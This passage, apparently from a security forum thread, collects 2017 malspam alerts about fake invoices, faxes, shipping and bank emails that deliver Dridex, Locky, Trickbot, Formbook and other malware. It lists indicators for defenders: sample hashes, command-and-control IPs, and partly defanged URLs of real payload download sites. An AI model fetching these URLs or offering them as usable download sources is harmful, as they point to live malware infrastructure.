smebusinesslink .com on 24th September 2017 using eranet .com as registrar and hosted on OVH 188.165.217.40
> https://myonlinesecurity.co.uk/fake-efax-message-from-0300-200-3835-2-pages-malspam-delivers-smoke-sharik-dofoil-and-trickbot/
inboundcop .com on 24th September 2017 using eranet .com as registrar and hosted on OVH 188.165.232.177 ...
> https://myonlinesecurity.co.uk/fake-efax-message-from-0300-200-3835-2-pages-malspam-delivers-smoke-sharik-dofoil-and-trickbot/
They are sending these emails from a whole range of IP addresses (all tracking back to various subdomains of the 2 main -fraudulent- domains) under the control of these criminals that pass email authentication for the -fake- domains:
46.105.101.20
46.105.101.72
46.105.101.110
54.36.192.0/24
94.23.32.95
188.165.217.40
188.165.217.44
188.165.200.80
188.165.215.105
188.165.215.115
188.165.239.123
188.165.232.177
188.165.217.228
... The emails are just about identical to those on these 2 pages with the dates and amounts changed:
> 'Virgin Media Your Virgin Media bill is ready' ... and 'e Fax' ...
The link in the email goes to a -compromised- or fraudulently-set-up OneDrive for business/SharePoint site where a zip file containing a .js file is downloaded...
The virgin site is:
https ://grllen-my.sharepoint .com/personal/misaacs_grllen_com_au/_layouts/15/guestaccess.aspx?docid=0f577514318c64d3a83fdc412856063e6&authkey=AZhzom6O9TOyFzZv4HUJ6zM
where a .js file is downloaded. That downloads 46.105.102.161 /PDF/Virginmedia_bill_25_09_2017_3 .pdf
an innocent PDF file of a -genuine- Virgin media bill and displays that while at the same time downloads the Dridex banking Trojan in the background (I cannot determine the actual download location of the Dridex Trojan from the reports)
Virginmedia_bill_25_09_2017_3.zip: Extracts to: Virginmedia_bill_25_09_2017_3.js
Current Virus total detections 4/58[1]. Payload Security[2] | Dridex Payload - VirusTotal 13/61[3]|
Payload Security[4] |
The eFax site is:
https ://ucg1-my.sharepoint .com/personal/janet_lau_ucg_co_nz/_layouts/15/guestaccess.aspx?docid=0eab92172e4fb424093bc21e476a6a698&authkey=AT_9AE00prV_R0aRf9HYOtg
where another js file is downloaded. That also downloads an innocent PDF file from
188.165.193.38 /PDF/FAX_20170925_1401908954_6.pdf
saying it all about the Rural Payments agency and displays that while at the same time downloads the
-Dridex- banking Trojan in the background (I cannot determine the actual download location of the Dridex Trojan from the reports)...:
FAX_20170925_1401908954_6.zip: Extracts to: FAX_20170925_1401908954_6.js
Current Virus total detections 7/59[5]: Payload Security[6] | Dridex Payload - VirusTotal 13/61[7] |
Payload Security[8] |
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustotal.com/en/file/0df50f3718c1718a4d75e8cf473446cf1a9268d9095459f60aafd28873b4f6fa/analysis/1506415697/
Virginmedia_bill_25_09_2017_3.js
2] https://www.hybrid-analysis.com/sample/0df50f3718c1718a4d75e8cf473446cf1a9268d9095459f60aafd28873b4f6fa?environmentId=100
Contacted Hosts
46.105.102.161
173.203.123.102
193.218.145.101
162.243.137.50
87.106.219.40
3] https://www.virustotal.com/en/file/94cf110c69bab9d6645fb1dbd8f97bcb3e3a66334097223a37bf2198bd045c3f/analysis/1506415824/
4] https://www.hybrid-analysis.com/sample/94cf110c69bab9d6645fb1dbd8f97bcb3e3a66334097223a37bf2198bd045c3f?environmentId=100
Contacted Hosts
173.203.123.102
193.218.145.101
162.243.137.50
87.106.219.40
5] https://www.virustotal.com/en/file/5cd789842cb215d493d6dd227c72c0a3f95ada69bb40c049ae9b7cb0d7a4a5b0/analysis/1506418921/
FAX_20170925_1401908954_6.js
6] https://www.hybrid-analysis.com/sample/5cd789842cb215d493d6dd227c72c0a3f95ada69bb40c049ae9b7cb0d7a4a5b0?environmentId=100
Contacted Hosts
104.146.230.59
188.165.193.38
173.203.123.102
193.218.145.101
162.243.137.50
87.106.219.40
7] https://www.virustotal.com/en/file/94cf110c69bab9d6645fb1dbd8f97bcb3e3a66334097223a37bf2198bd045c3f/analysis/1506415824/
8] https://www.hybrid-analysis.com/sample/94cf110c69bab9d6645fb1dbd8f97bcb3e3a66334097223a37bf2198bd045c3f?environmentId=100
Contacted Hosts
173.203.123.102
193.218.145.101
162.243.137.50
87.106.219.40
grllen-my.sharepoint .com: 13.107.6.151: https://www.virustotal.com/en/ip-address/13.107.6.151/information/
ucg1-my.sharepoint .com: 13.107.6.151
188.165.217.40: https://www.virustotal.com/en/ip-address/188.165.217.40/information/
188.165.232.177: https://www.virustotal.com/en/ip-address/188.165.232.177/information/
:fear::fear: :mad:
AplusWebMaster
2017-09-27, 17:44
FYI...
Fake 'UPS' SPAM - tries to deliver malware
- https://myonlinesecurity.co.uk/fake-ups-quantum-view-ups-ship-notification-tracking-number-tries-to-deliver-malware/
27 Sep 2017 - "... malware downloaders... an email with the subject of 'UPS Ship Notification, Tracking Number 1Z51322Y3483221007' (random numbers) pretending to come from UPS Quantum View <pkginfo26@ ups .com> (random pkginfo numbers)...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/UPS-Ship-Notification-Tracking-Number-1Z51322Y3483221007.png
... following the link gives you a webpage looking like one of these screenshots pressing login does different things or -nothing- depending on the site:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/fake_UPS_tracking.png
This is a slightly more complicated infection chain that usual. There are -dozens- of different sites in the emails -hidden- behind the shipment details link. A lot of them don’t do anything except display a -fake- UPS website. Some however are connecting via an -iframe- to download
http ://rateventrithathen .info/track.php which gave me TRACK-1Z68725Y5236890147.js
Current Virus total detections 2/59*. Payload Security** | Joe Security***
Neither online sandbox retrieved any payload, whether the sites are blocked or the JS is VM aware is unknown... The basic rule is NEVER open any attachment or link in email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a6c8824c80f4b2330921963ce277a9ad4c189f6f8850128a15f80d9a91d87dcc/analysis/1506504272/
TRACK-1Z68725Y5236890147.js
** https://www.hybrid-analysis.com/sample/a6c8824c80f4b2330921963ce277a9ad4c189f6f8850128a15f80d9a91d87dcc?environmentId=100
Contacted Hosts
49.51.36.73
*** https://jbxcloud.joesecurity.org/analysis/378185/1/html
rateventrithathen .info: 49.51.36.73: https://www.virustotal.com/en/ip-address/49.51.36.73/information/
> https://www.virustotal.com/en/url/39326c0e62e2e222ecbcfdd844eef803f0919d514c92c67669aa5850787764cf/analysis/
___
Email credential phish...
- https://myonlinesecurity.co.uk/email-credential-phishing-via-fake-emirates-bank-statement-and-fake-generic-proforma-invoice-scams/
27 Sep 2017 - "... seeing a series of “attacks” using Adobe as the lure. So far I have seen 2 different ones...
Screenshot:
1] https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Fake-Emirates-Bank-Cash-Statement-email.png
This email has a genuine PDF attachment with a link to http ://bit .ly/2wTMuYg which will -redirect- you to
http ://cloudy-exch .pw/invoice/update.HTML. There is a warning on the bit.ly page that alerts to it being a phishing or malware site but will -still- allow you to visit the page by clicking-the-link:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/cash-statement_pdf.png
... However downloading the html file will open in Firefox only on the computer.
The page looks like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/cloudy_data_text_adobe.png
... where -if- you enter any details and press submit, you are redirected to https ://drive.google .com/file/d/0BxKSeHpNweSsWldNaGpUMDlHWW8/view
... where you see this -fake- statement:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/cash-statement_google_drive.png
The next -phishing-scam- works right out of the box with no effort:
2] https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Request-For-Proforma-Invoice-Urgent.png
This PDF attachment looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Ugent-New-Order_pdf.png
Where -if- you follow the link you go to
https ://app-onlinedoc.000webhostapp .com/Inv-47654345584.php?code=2000500 where you see:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/000webhost_adobe_scam.png
Entering details tries to -redirect- you to
http ://alliancecr .com/skd/xendr.php , Where I get a 404 page not found (a quick look up shows the site registered by Godaddy in 2001, The DNS is managed by Cloudflare and there is no site found, so it is highly likely that Cloudflare have null routed the DNS already)... A quick look at the source code of the 000webhost page shows that it appears to try to send the information via Googlemail... Update: within minutes of reporting the 000webhost site, it was taken down. That is fast abuse response. I wish all webhosts were so quick and efficient..."
cloudy-exch .pw: 185.158.249.100: https://www.virustotal.com/en/ip-address/185.158.249.100/information/
> https://www.virustotal.com/en/url/5ada7d41c615d3f3605b35e89a6acfe9ad674bdf10981d9228dd14d88de837b8/analysis/
app-onlinedoc.000webhostapp .com: 145.14.145.6: https://www.virustotal.com/en/ip-address/145.14.145.6/information/
alliancecr .com: Could not find an IP address for this domain name...
___
JavaScript and Stealer DLL Variant in New Attacks
- http://blog.talosintelligence.com/2017/09/fin7-stealer.html
Sep 27, 2017 - "... a newly discovered -RTF- document family that is being leveraged by the FIN7 group (also known as the Carbanak gang) which is a financially-motivated group targeting the financial, hospitality, and medical industries. This document is used in -phishing- campaigns to execute a series of scripting languages containing multiple obfuscation mechanisms and advanced techniques to bypass traditional security mechanisms. The document contains messages enticing the user to click on an embedded object that executes scripts which are used to infect the system with an information stealing malware variant. This malware is then used to steal passwords from popular browsers and mail clients which are sent to remote nodes that are accessible to the attackers... The dropper variant that we encountered makes use of an LNK file to execute wscript.exe with the beginning of the JavaScript chain from a word document object...
Command and Control IPs"
104.232.34.36: https://www.virustotal.com/en/ip-address/104.232.34.36/information/
5.149.253.126: https://www.virustotal.com/en/ip-address/5.149.253.126/information/
185.180.197.20: https://www.virustotal.com/en/ip-address/185.180.197.20/information/
195.54.162.79: https://www.virustotal.com/en/ip-address/195.54.162.79/information/
31.148.219.18: https://www.virustotal.com/en/ip-address/31.148.219.18/information/
(More detail at the talosintelligence URL above.)
:fear::fear: :mad:
AplusWebMaster
2017-09-28, 13:18
FYI...
Fake 'Scan xxx' SPAM - Necurs sent Locky/Trickbot
- https://myonlinesecurity.co.uk/necurs-botnet-spam-now-distributing-locky-and-trickbot-via-same-vbs-file-using-geo-location-techniques/
28 Sep 2017 - "... malware downloaders coming from the necurs botnet... email with the subject of 'Emailing: Scan0253' (random numbers) pretending to come from random names at your-own-email-address or company domain. Today they have changed delivery method and will give either Locky Ransomware or Trickbot banking Trojan depending on your IP address and country of origin...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Emailing-Scan0253-locky-and-trickbot-delivery-email.png
Scan0253.7z: Extracts to: Scan0277.vbs - Current Virus total detections 11/59*. Payload Security** |
In this particular VBS example there were 6 hard coded urls
“geeks-online .de/9hciunery8g?”,
”freevillemusic .com/9hciunery8g?” (VirusTotal 9/65[3]) (Payload Security[4]) Looks like Trickbot
“anarakdesert .com/LUYTbjnrf?”,
”americanbulldogradio .com/LUYTbjnrf?”
”sherylbro .net/p66/LUYTbjnrf” (VirusTotal 20/65[5]) (Payload Security[6]) This one is Locky
“poemsan .info/p66/d8743fgh” - Also Locky but a different file hash (VirusTotal 39/64[7]) (Payload Security[8])
The lookup services used are : “https ://ipinfo .io/json”,
”http ://www.geoplugin .net/json.gp”,
”http ://freegeoip .net/json/”
Update: thanks to Racco42[9] we have full list of currently known URLs posted on Pastebin[10]...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/882d308ab744d112b60f62faabc0dfdd6ff5dd2ff77a8fd0c664098f01ec7ea6/analysis/1506589221/
Scan0277.vbs
** https://www.hybrid-analysis.com/sample/882d308ab744d112b60f62faabc0dfdd6ff5dd2ff77a8fd0c664098f01ec7ea6?environmentId=100
Contacted Hosts
216.239.38.21
178.237.36.10
205.204.66.82
3] https://www.virustotal.com/en/file/01e771dc6cf9572eac3d87120d7a7d1ff95fdc1499b668c7fde2919e0f685256/analysis/1506589359/
4] https://www.hybrid-analysis.com/sample/01e771dc6cf9572eac3d87120d7a7d1ff95fdc1499b668c7fde2919e0f685256?environmentId=100
5] https://www.virustotal.com/en/file/4551578e5445ffb08965a1c946b9c4f8934b96f15ad591fea251c8eceda750a6/analysis/1506589526/
6] https://www.hybrid-analysis.com/sample/4551578e5445ffb08965a1c946b9c4f8934b96f15ad591fea251c8eceda750a6?environmentId=100
7] https://www.virustotal.com/en/file/3e55a7a405e4c4e4ad6d19296ac512d6c32441d5a65419cd116faa672b11963c/analysis/1506591639/
8] https://www.hybrid-analysis.com/sample/3e55a7a405e4c4e4ad6d19296ac512d6c32441d5a65419cd116faa672b11963c?environmentId=100
9] https://twitter.com/Racco42/status/913339950015373312
10] https://pastebin.com/ahfN337m
> http://blog.dynamoo.com/2017/09/malware-spam-emailing-scan0xxx-from.html
28 Sep 2017 - "This -fake- 'document scan' delivers different malware depending on the victim's location...
... All these recent attacks have used .7z archive files which would require 7zip or a compatible program to unarchive. Most decent mail filtering tools should be able to block -or- strip this extension, more clever ones would be able to determine that there is a .vbs script in there and block on that too."
:fear::fear: :mad:
AplusWebMaster
2017-09-29, 19:42
FYI...
Fake 'invoice' SPAM - deliver Locky/Trickbot
- https://myonlinesecurity.co.uk/another-change-with-locky-delivery-methods-today-payload-embedded-in-a-large-js-file/
29 Sep 2017 - "... Locky downloaders... an email with a blank/empty subject pretending to come from random names and email addresses. The body content pretends to be an 'invoice' notification. There are -no- attachments with these emails but a link-in-the-email-body goes to various -compromised- sites to download a .js file. As far as I can tell the actual Locky payload is -embedded- inside the .js file. For some strange reason the js file is named voicemsg_random numbers.js which would indicate that this was intended or has also been used in a voice message scam attempt to deliver Locky as well. The other strange thing in this campaign is the url in the body. All the ones I received are broken and start with 'ttp://' but looking at the mailscanner they look normal with a -complete- html on my server they look -normal- with a complete html and start with the proper 'http://'...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/invoice-email-with-blank-subject.png
voicemsg_088436.js - 410.7 KB (420558 bytes) - Current Virus total detections 5/59*. Payload Security**
| drops 1102.exe 298.0 KB (305152 bytes) - VirusTotal 14/65[3] - Payload Security[4].
Nothing is actually detecting these as -Locky- Ransomware and in fact some AV on VirusTotal detect as
-Cerber- Ransomware. I am only calling these Locky based on the
moroplinghaptan .info/eroorrrs post request (giving a 404) shown in the Payload Security report. This has been a strong Indicator-of-Compromise (IOC) for Locky recently.
> Update: I am reliably informed that it depends on your IP address and location what malware you get. You will either get
-Locky- Ransomware or -Trickbot- banking Trojan embedded inside the .js file.
Some of the download sites in the emails include:
http ://resortphotographics .com/invoice.html
http ://somallc .com/invoice.html
http ://pinkyardflamingos .com/invoice.html
http ://agregate-cariera .ro/invoice.html
http ://sgtenterprises .com/invoice.html
http ://weloveflowers .co.uk/invoice.html
They all use an -iframe- to actually download from
http ://moroplinghaptan .info/offjsjs/ - This site has been used in a later Locky campaign today that was spoofing voicemessages...
The basic rule is NEVER open any attachment or -link- an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/beab97c46f237c07a12390f3002516a5b62f2dbc4a56a6bcc3f0dc59e0fbf5c5/analysis/1506691940/
voicemsg_088436.js
** https://www.hybrid-analysis.com/sample/beab97c46f237c07a12390f3002516a5b62f2dbc4a56a6bcc3f0dc59e0fbf5c5?environmentId=100
Contacted Hosts
49.51.133.167
216.58.213.174
3] https://www.virustotal.com/en/file/34d9864013844cc0f7e57d30444fd498a9f5394ab2eedef93440d3806053fe35/analysis/1506692289/
1102.exe
4] https://www.hybrid-analysis.com/sample/34d9864013844cc0f7e57d30444fd498a9f5394ab2eedef93440d3806053fe35?environmentId=100
moroplinghaptan .info: 49.51.133.167: https://www.virustotal.com/en/ip-address/49.51.133.167/information/
> https://www.virustotal.com/en/url/47cca10fea1cab5319052d318d669578043c23b4b13900814b08f0582fcba588/analysis/
___
Fake 'Office 365 invoice' - delivers Locky
- https://myonlinesecurity.co.uk/fake-office-365-invoice-delivers-locky-ransomware/
29 Sep 2017 - "The 3rd version I have seen today... Locky downloaders has gone back to a traditional zip (7z) attachment containing a vbs file. This is an email pretending to be an 'Office 365 Invoice' with the subject of 'Invoice' pretending to come from the -same-name- that is in the recipient field. Random names & email addresses...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Invoice_O365.png
604173.7z: Extracts to: Invoice_930546166795.vbs - Current Virus total detections 10/58*. Payload Security**
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/816f7822d86ec7cc7d73b6458658e7e2bb3e600811aa068d9f2611fd21825268/analysis/1506683968/
** https://www.virustotal.com/en/file/816f7822d86ec7cc7d73b6458658e7e2bb3e600811aa068d9f2611fd21825268/analysis/1506683968/
Contacted Hosts
185.57.172.213: https://www.virustotal.com/en/ip-address/185.57.172.213/information/
___
Fake 'order' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-order-malspam-email-with-uue-attachment-delivers-malware/
29 Sep 2017 - "... malware today, all using -different- or unusual delivery methods. This next example is about an order confirmation. The attachment is a .uue attachment. Winzip says it can open .UUE files but only extracted a -garbled- encrypted/encoded txt file. Universal extractor extracted a working .exe file...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/pecindia_order_email.png
order290917.uue: (virusTotal 4/58*) - Extracts to: order290917.exe - Current Virus total detections 14/64**
Payload Security***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/fb486990afc3ca4f4510d61c38e426284ea15c1dac426c7871c60757b5b6818d/analysis/1506681970/
order290917.uue
** https://www.virustotal.com/en/file/38fc1b4fbd4f3c4e78179775436a791fcc476d4ba3c4628fc3b6d1e618cbe837/analysis/1506696900/
order290917.exe
*** https://www.hybrid-analysis.com/sample/38fc1b4fbd4f3c4e78179775436a791fcc476d4ba3c4628fc3b6d1e618cbe837?environmentId=100
:fear::fear: :mad:
AplusWebMaster
2017-10-02, 20:58
FYI...
Fake 'order' SPAM - delivers malware
- https://myonlinesecurity.co.uk/another-fake-order-email-with-rtf-attachment-delivers-malware/
2 Oct 2017 - "An email with the subject of 'Fwd: Re: Order' pretending to come from info@ anashin .am with a malicious word doc attachment delivers malware...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/order_02101777_doc_email.png
Order0210177.doc - Current Virus total detections 15/58*. Payload Security** downloads
http ://birsekermasali .com/hta/gen.hta (VirusTotal 15/57[3]) (Payload Security[4]) which in turn downloads
http ://birsekermasali .com/css_files/gen/quote.exe (VirusTotal 25/66[5]) (Payload Security[6])... This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run will infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/fd8ed18547954c8355cef69167f01ebc65330ba585e24645beb977967a01e322/analysis/1506949614/
Order0210177.doc
** https://www.hybrid-analysis.com/sample/fd8ed18547954c8355cef69167f01ebc65330ba585e24645beb977967a01e322?environmentId=100
DNS Requests
192.185.115.14
3] https://www.virustotal.com/en/file/48366f986beed7c17dca2b741b99c8f2da2cf12032d4eb19bf5cd8bc851a4af6/analysis/1506968237/
gen.hta
4] https://www.hybrid-analysis.com/sample/48366f986beed7c17dca2b741b99c8f2da2cf12032d4eb19bf5cd8bc851a4af6?environmentId=100
Contacted Hosts
192.185.115.14
198.187.29.143
5] https://www.virustotal.com/en/file/4cd3e00e939755dee6c24a31517c9e2c30a285420328234d26944e6d337df458/analysis/1506967286/
quote.exe
6] https://www.hybrid-analysis.com/sample/4cd3e00e939755dee6c24a31517c9e2c30a285420328234d26944e6d337df458?environmentId=100
birsekermasali .com: 192.185.115.14: https://www.virustotal.com/en/ip-address/192.185.115.14/information/
> https://www.virustotal.com/en/url/e3624a8df83ad5e6705b5221814e2f6eca70518cf8355d62e69c902a96fc43f3/analysis/
> https://www.virustotal.com/en/url/dd0ea4ed7f9b1d828bbafc013baeb7dd1ce727788e68ab696cbedbc8e9b26ef3/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-10-03, 19:34
FYI...
Fake 'FedEx' SPAM - leads to info stealer
- https://isc.sans.edu/diary/rss/22888
2017-10-03 - "... On Monday 2017-10-02, I ran across malicious spam (malspam) pushing Formbook, an information stealer. Arbor Networks has a good article about Formbook here:
> https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/
... The email is disguised as a 'FedEx delivery notice'. It has a-link-to-a-compromised-website that's hosting malware. The link points to a supposed document for this fake delivery:
> https://isc.sans.edu/diaryimages/images/2017-10-03-ISC-diary-image-01.jpg
Clicking on-the-link (DON'T) returned a RAR archive. The RAR archive contains a Windows executable that's poorly-disguised as some sort of receipt... indicators seen during the infection from Formbook malspam on Monday 2017-10-02:
Email:
Date/Time: 2017-11-02 at 14:23 UTC
Subject: Re: Alert: FedEx OFFICE Delivery® ... 17-10-02, at 07:22:11 AM BA
From: "DOCUMENT2017" <gifcos@ tutanota.com>
Link from the email: hxxps ://superiorleather .co.uk/Receipt.r22
Traffic seen when retrieving the RAR archive:
185.46.121.66 [1] port 443 - superiorleather .co.uk - GET /Receipt.r22 ..."
1] 185.46.121.66: https://www.virustotal.com/en/ip-address/185.46.121.66/information/
> https://www.virustotal.com/en/url/97b66925f5ddbb92974955a3cc28c0d6d6049cedc3bdc9497f1334c0dcfc6369/analysis/
Post-infection traffic:
47.90.52.201 port 80 - www .shucancan .com - GET /ch/?id=[80 character ID string]
52.87.61.120 port 80 - www .ias39 .com - GET /ch/?id=[80 character ID string]
66.206.43.242 port 80 - www .fairwaytablet .com - GET /ch/?id=[80 character ID string]
103.38.43.236 port 80 - www .chunsujiayuan .com - GET /ch/?id=[80 character ID string]
104.250.134.156 port 80 - www .ebjouv .info - GET /ch/?id=[80 character ID string]
104.31.80.135 port 80 - www .dailyredherald .com - GET /ch/?id=[80 character ID string]
153.92.6.50 port 80 - www .beykozevdenevenakliyatci .com - GET /ch/?id=[80 character ID string]
162.242.173.39 port 80 - www .238thrift .com - GET /ch/?id=[80 character ID string]
180.178.39.66 port 80 - www .et551 .com - GET /ch/?id=[80 character ID string]
195.154.21.65 port 80 - www .lesjardinsdemilady .com - GET /ch/?id=[80 character ID string]
198.54.114.238 port 80 - www .prfitvxnfe .info - GET /ch/?id=[80 character ID string]
199.34.228.59 port 80 - www .craigjrspestservice .com - GET /ch/?id=[80 character ID string]
162.242.173.39 port 80 - www .238thrift .com - POST /ch/
198.54.114.238 port 80 - www .prfitvxnfe .info - POST /ch/ "
(More detail @ the isc URL above.)
> http://www.malware-traffic-analysis.net/2017/10/03/index.html
___
Fake 'Shipping' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-valero-com-re-shipping-arrangement-process-malspam-delivers-malware/
3 Oct 2017 - "... an email with the subject of 'Re: Shipping arrangement process' pretending to come from Valero .com but coming from Anna Brugt <dhen.ordonez@ ritetrend .com.ph>...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Shipping-arrangement-process.png
There is a-link-in-the-email body to
http ://www.oysterpublicschool .com//hy/reciept/_outputC9E322F.exe which gives a 404,
but there is also a RAR attachment with a file of the same name. It is highly likely that other versions of this email will have a different download link, that might be active.
_outputC9E322F.rar: Extracts to: _outputC9E322F.exe - Current Virus total detections 15/66*. Payload Security**
The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/262b9b396f8c02ed1f8ff7b3b99fe6d017ee7023be97ecdc8db6b8d711f7102f/analysis/1507051011/
_outputC9E322F.exe
** https://www.hybrid-analysis.com/sample/262b9b396f8c02ed1f8ff7b3b99fe6d017ee7023be97ecdc8db6b8d711f7102f?environmentId=100
Contacted Hosts
109.169.89.11
oysterpublicschool .com: 192.185.115.66: https://www.virustotal.com/en/ip-address/192.185.115.66/information/
___
Fake 'Cash Statement' SPAM - delivers malware
- https://myonlinesecurity.co.uk/cash-statement-of-account-10032017-malspam-delivers-malware/
3 Oct 2017 - ... Malware downloaders... an email with the subject of 'Cash Statement of Account 10/03/2017' coming from Front Desk <reception@ st-timsrc .org>...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Cash-Statement-of-Account-10-03-2017.png
The email has a pdf attachment with a link to
https ://goo .gl/4tzM3b which redirects to
http ://uae-moneyremit .top/plugins/cfare.html where you seen a page like this asking you to install a plugin to view the page:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/plugin_needed.png
Pressing install will download
https ://www.dropbox .com/s/piw5k38lytremqz/firefoxplugin_install.exe (VirusTotal 13/64*) (Payload Security**)
We have had a series of these emails recently (28 September 2017) was DAY END CASH PAYMENT REPORT AS ON 28/09/2017 which delivered fxplugin_install.exe (VirusTotal 44/65[3]) (Payload Security[4]) which was netwire RAT...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/bfb120b45ffd594ebb95b4a23fb3f65b1099dd5045641cdd15de59c2296ca04d/analysis/1507058018/
firefoxplugin_install.exe
** https://www.hybrid-analysis.com/sample/bfb120b45ffd594ebb95b4a23fb3f65b1099dd5045641cdd15de59c2296ca04d?environmentId=100
Contacted Hosts
5.206.227.248
3] https://www.virustotal.com/en/file/244690f195b6fcd12d57f1b6d1a0114619d4e8e6f06df2de28e055be74c2252b/analysis/1506917666/
4] https://www.hybrid-analysis.com/sample/244690f195b6fcd12d57f1b6d1a0114619d4e8e6f06df2de28e055be74c2252b?environmentId=100
Contacted Hosts
85.159.233.23
:fear::fear: :mad:
AplusWebMaster
2017-10-04, 11:46
FYI...
Fake 'Copy of invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-screwfix-copy-of-invoice-a5165059014-please-find-your-invoice-attached-delivers-locky-ransomware/
4 Oct 2017 - "... Locky downloaders... an email with the subject of 'Copy of invoice A5165059014. Please find your invoice attached' pretending to come from online@ screwfix .com...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Copy-of-invoice-A5165059014-Please-find-your-invoice-attached.png
InvoiceA5165059014.7z: Extracts to: Invoice558727316499528791952132.vbs - Current Virus total detections 6/59*
Payload Security** downloads from one of these hard coded locations in this vbs. (There will be numerous others):
“spazioireos .it/8etyfh3ni?”,
”derainlay .info/p66/8etyfh3ni”,
”turfschiploge .nl/8etyfh3ni?” (VirusTotal 16/65[3])...
> Update: current list of known download sites PASTEBIN(a) thanks to Racco42(b)
a) https://pastebin.com/ajXf4k0f
b) https://twitter.com/Racco42
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/db5a2c3afd9f6a4ba6ab97309bc7e08603626f3d6a8170a14fc9c527b13ab751/analysis/1507106667/
Invoice558727316499528791952132.vbs
** https://www.hybrid-analysis.com/sample/db5a2c3afd9f6a4ba6ab97309bc7e08603626f3d6a8170a14fc9c527b13ab751?environmentId=100
Contacted Hosts
81.29.205.233
3] https://www.virustotal.com/en/file/7c88ec63f7ca11a22add9f77f47f7ac8f71e930b3dd24422940c28cc8fd22ac2/analysis/1507107227/
spazioireos .it: 81.29.205.233: https://www.virustotal.com/en/ip-address/81.29.205.233/information/
derainlay .info: https://en.wikipedia.org/wiki/Fast_flux
turfschiploge .nl: 46.235.43.11: https://www.virustotal.com/en/ip-address/46.235.43.11/information/
___
Fake 'Payment Confirmation' SPAM - delivers java adwind
- https://myonlinesecurity.co.uk/fake-xpress-money-payment-confirmation-delivers-java-adwind/
4 Oct 2017 - "... -fake- financial themed emails containing java adwind or Java Jacksbot attachments or -links- to download them. I have previously mentioned many of these HERE[1]...
1] https://myonlinesecurity.co.uk/?s=java+adwind
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Xpress-Money-Payment-Confirmation.png
Xpress Money Payment Confirmation.jar (462kb) - Current Virus total detections 16/62*. Payload Security**...
All the links-in-the-email (including the -image- of an XLS file) go to the-same-url (guaranteed to be a compromised site), where the all the site content is now about QTUM, a -bitcoin- exchange. I have been seeing several compromised malware delivery sites recently with all their content changed to the QTUM content) to download a zip file:
http ://restaurantelburladero .com/Xpress Money Payment Confirmation.z (.z is a file extension that many unzipping utilities will extract from, although not commonly used)... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e724c779d3bd6062dda5f682d85a2cd715278c4950ee38e5f54918b9b41137ac/analysis/1507035357/
Scan 2017100323 114727.xls Here.JAR
** https://www.hybrid-analysis.com/sample/e724c779d3bd6062dda5f682d85a2cd715278c4950ee38e5f54918b9b41137ac?environmentId=100
Contacted Hosts
216.58.209.238
restaurantelburladero .com: 5.2.88.79: https://www.virustotal.com/en/ip-address/5.2.88.79/information/
> https://www.virustotal.com/en/url/a5aa2bd46bc8d1f005c35ce2ea482cb7f8c9316b5e478594bfe9e1bafd31fc97/analysis/
___
'Dnsmasq' - multiple vulnerabilities
> https://www.helpnetsecurity.com/2017/10/03/dnsmasq-flaws/
Oct 3, 2017
> https://www.kb.cert.org/vuls/id/973527
2 Oct 2017
> http://www.securitytracker.com/id/1039474
Oct 2 2017
:fear::fear: :mad:
AplusWebMaster
2017-10-05, 12:49
FYI...
Fake 'Payment Advice' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-hsbc-important-payment-advice-delivers-trickbot-banking-trojan/
5 Oct 2017 - "An email with the subject of 'Important – Payment Advice' pretending to come from HSBC but actually coming from a look-a-like domain HSBC <no-reply@ hsbcpaymentadvice .com> or HSBC <no-reply@ hsbcadvice .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan... there is a slight formatting problem in Outlook, where the emails arrive with a -blank- body. Reading in plain text or using view source, shows the content...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Important-Payment-Advice_-HSBC.png
SecureMessage.doc - Current Virus total detections 10/59*. Payload Security**
This malware file downloads from
http ://diga-consult .de/ser1004.png which of course is -not- an image file but a renamed .exe file that gets renamed to aqdccc.exE (VirusTotal 13/65***). An alternative download location is
http ://hill-familie .de/ser1004.png
